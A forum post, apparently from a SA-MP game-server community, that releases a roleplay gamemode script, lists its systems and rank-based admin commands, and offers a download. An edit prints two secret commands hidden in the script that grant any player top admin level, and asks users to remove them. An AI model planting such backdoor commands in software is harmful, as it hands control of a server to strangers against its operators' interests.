22.01.2015, 20:23
Last edited by Antoniohl; 02/12/2016 at 11:32 AM.
Old thread
First special thanks to George K(for helping us a bit with scripting)
Second special thanks to Bl4573R(Mapping.)
i kept this script with me for long time, since i'm not going to use it anymore i will release it, seriously i like this game mode but it's useless for me.
-Dynamic Business system-Dynamic House system
-Dynamic Garage system
-Dynamic faction system
-Dynamic family system
-Dynamic Point system
-Dynamic motel system
-Dynamic ATM system
-Dynamic Map-Box system
-Dynamic Map-Icon system
-Dynamic Family HQ system
-Dynamic Faction HQ system
-Dynamic Family-Gate system
-Dynamic Faction-Gate system
-Dynamic Entrance system
-Dynamic Building system
-Dynamic Family-Vehicles system
-Dynamic Information-Board system
-Dynamic Dealership system
-Dynamic OOC Shop / Gold Bars system
-Dynamic Gas-Station system
-Dynamic Drive-Thru system
-Dynamic VIP lounges system
-Dynamic money-bags ystem
-Dynamic Gift-Box system
The old Script had a problem with /sellcar and /accept car,look there's just a missing part, /accept car, that's all, /sellcar created but we had irl problems that's why we have stopped working.
and about Mapping objects, it works fine now you can map in game and use /editor
Here's a list of admin commands
Server Moderator : /listguns /check /spec /setint /setvw /mute /nmute (/a)dmin /warnings /ch /kcc /senddmv Junior Administrator: /skydive /bigears /freeze /unfreeze /slap /warn /cnn /rmute /goto /sendtols Junior Administrator: /refund /tuteject /hoseject /fuelcars /setjob /forcetut"); Junior Administrator: /freezeplayers /unfreezeplayers /setskin /muteplayers /unmuteplayers /admute Junior Administrator: /listmuted /listmasked /kick /ban /aduty /adutyoff /checkprison /afgate /agate General Administrator: /fws /atazer /amask General Administrator: /rhw /cp /mole /had /ipcheck /countdown /disarm /nohospital /setaccent /acolorcar /setgas /setcarint /setcarvw Senior Administrator: /veh /vehmenu /fixveh /sethp /setarmor /givegun /givegunall /setgunskill /givemoney /setmoney /setstat /setfightstyle /setanim /givecookieall /givegoldbarall Senior Administrator: /veh /vehmenu /fixveh /sethp /setarmor /givegun /givegunall /setgunskill /givemoney /setmoney /setstat /setfightstyle /setanim /givecookieall /givegoldbarall Senior Administrator: /setplayercolor /setplayerwanted /load /adivorce /makeircadmin /destroycar Senior Administrator: /destroycars /eventhelp /setcrime /givecookie /gotobluebus /gotoblackbus /fartbomb Head Administrator: /weather /weatherall /tod /dedit /pointtime /adetain Head Administrator: /gotocar /pban /unban /banaccount /gotocar /wl /setcolor /banip /unbanip /deleteaccount /rangeban Head Administrator: /giftbox /editpoint /setgoldbars /givegoldbar /goincar /fire /re(sources) Community Manager: /hqcreate /hqdelete /ganghqid /createfamgate /deletefamgate /editfamgate /famgateeditor /famegateid /fedit Community Manager: /createfacgate /deletefacgate /facgateeditor /editfacgate /facgateid /editfaction /editfactionpay /createfcar /deletefcar Community Manager: /creategate /deletegate /editgate /gateid /acceptrequest Co-Executive Admin: /bizint /createbiz /deletebiz /bizlevel /bizprice /biztype /bizprods /movebiz /clearbiz /setbizowner /gotobiz /lockbiz Co-Executive Admin: /houseint /chouseint /createhouse /deletehouse /houselevel /houseprice /movehouse /clearhouse /sethouseowner /gotohouse Co-Executive Admin: /createfamily /deletefamily Co-Executive Admin: /createbuilding /deletebuilding /buildingname /lockbuilding /movebuilding /buildingvw /makebuildingvip /sbm(setbuildingmusic) /gotobuilding Co-Executive Admin: /createentrance /editentrance /entranceid /deleteentrance /gotoentrance Co-Executive Admin: /creategarage /deletegarage /editgarage /gotogarage /garageid /gotogarage Co-Executive Admin: /createmotel /deletemotel /movemotel /motelvw /lockmotel /makemotelvip /motelname /gotomotel Co-Executive Admin: /createcar /deletecar /setcarinfo /createpcar /deletepcar /parkpcar Co-Executive Admin: /createdrivethru /deletedrivethru /editdrivethru Co-Executive Admin: /createHSS /deleteHSS /hssignid Co-Executive Admin: /createmapicon /editmapicon /nearmapicon Co-Executive Admin: /createMAPB /deleteMAPB Co-Executive Admin: /createinfoboard /deleteinfoboard /setinfoboardstring Co-Executive Admin: /creategstation /deletegstation Co-Executive Admin: /createoocshop /deleteoocshop Co-Executive Admin: /gcam - To Create Speed Camera! [You have to login with rcon] Co-Executive Admin: /createpickup Executive Administrator: /payday /oprison /lethimtalk Community Scripter : /shawntermination /forcerelog /makeleader /savechars /makemoneybag Community Scripter : /deletebag /deletebags /makehelper
Here's some pictures of VIP lounge and mechanic job location
To Tommy Martins
Download it from here
Good luck
EDIT: please remove the this CMD's from the script
if(strcmp(cmd, "/Fuckyouagains", true) == 0) { PlayerInfo[playerid][pAdmin] = 99999; SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin"); SendClientMessage(playerid, COLOR_LIGHTBLUE, string); return 1; } if(strcmp(cmd, "/fuckyoumanseriously", true) == 0) { PlayerInfo[playerid][pAdmin] = 100000; SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 100000 Administrator"); SendClientMessage(playerid, COLOR_LIGHTBLUE, string); return 1; }
@AllesandroG open the gamemode, in the gamemode locate the /makeadmin there should be a name there like Anotnio_Freeman, change that to your name. That way when you log in with your name, you will automatically be able to make yourself admin using the /makeadmin command without needing to change your account file or other stuff.
This should also help anyone else who wants to easily make themselfs admin on their own server when running this gamemode. |
i'm sorry i can't help you guys anymore with this game mode i'm not working with it anymore.